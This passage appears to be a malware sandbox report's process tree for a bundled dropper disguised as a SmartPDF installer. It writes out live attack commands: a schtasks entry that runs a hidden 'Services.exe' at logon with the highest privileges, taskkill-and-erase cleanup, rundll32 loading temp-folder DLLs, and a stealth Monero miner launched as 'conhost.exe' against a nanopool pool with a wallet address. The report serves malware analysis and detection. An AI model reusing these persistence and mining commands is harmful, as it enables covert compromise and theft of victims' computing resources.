- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:968 -
C:\Users\Admin\AppData\Local\Temp\is-RV4AF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RV4AF.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2076 -
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"3⤵PID:2912
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"4⤵PID:2060
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exeC:\Users\Admin\AppData\Local\Temp\Mortician.exe5⤵PID:2784
-
-
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws14⤵PID:2820
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit5⤵PID:2656
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "foradvertising.exe" /f6⤵
- Kills process with taskkill
PID:1780
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"4⤵PID:1084
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a5⤵PID:2628
-
-
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"4⤵PID:2120
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631101336 /qn CAMPAIGN=""710"" " CAMPAIGN="710"5⤵PID:2764
-
-
-
C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"4⤵PID:1204
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent3⤵PID:1664
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri19ca03f05489b.exeFri19ca03f05489b.exe1⤵
- Executes dropped EXE
PID:2044
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵PID:2800
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2800 CREDAT:275457 /prefetch:22⤵PID:2452
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "LzmwAqmV.exe" /f1⤵
- Kills process with taskkill
PID:3056
-
C:\Users\Admin\AppData\Local\Temp\is-0LETL.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-0LETL.tmp\stats.tmp" /SL5="$202E6,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent1⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\is-HPJ2E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HPJ2E.tmp\Setup.exe" /Verysilent2⤵PID:4300
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit3⤵PID:2648
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'4⤵
- Creates scheduled task(s)
PID:5968
-
-
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"3⤵PID:2104
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit4⤵PID:6132
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'5⤵
- Creates scheduled task(s)
PID:864
-
-
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth4⤵PID:7016
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2844 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1972
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:2572 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:1336
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2356
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:940
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1CA53481ADB2B6F41799DE7DB7270FDC C2⤵PID:2856
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 15C191C01463BB290422FCF120F354172⤵PID:1644
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:2256
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DBAAC1D089CEA0D4A2717A3C389DD7A8 M Global\MSI00002⤵PID:1496
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F6F68078-9A28-4F61-BE69-8324F99B7580} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:652
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:1500
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:2128
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:612
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:2032
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:2100
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:3456
-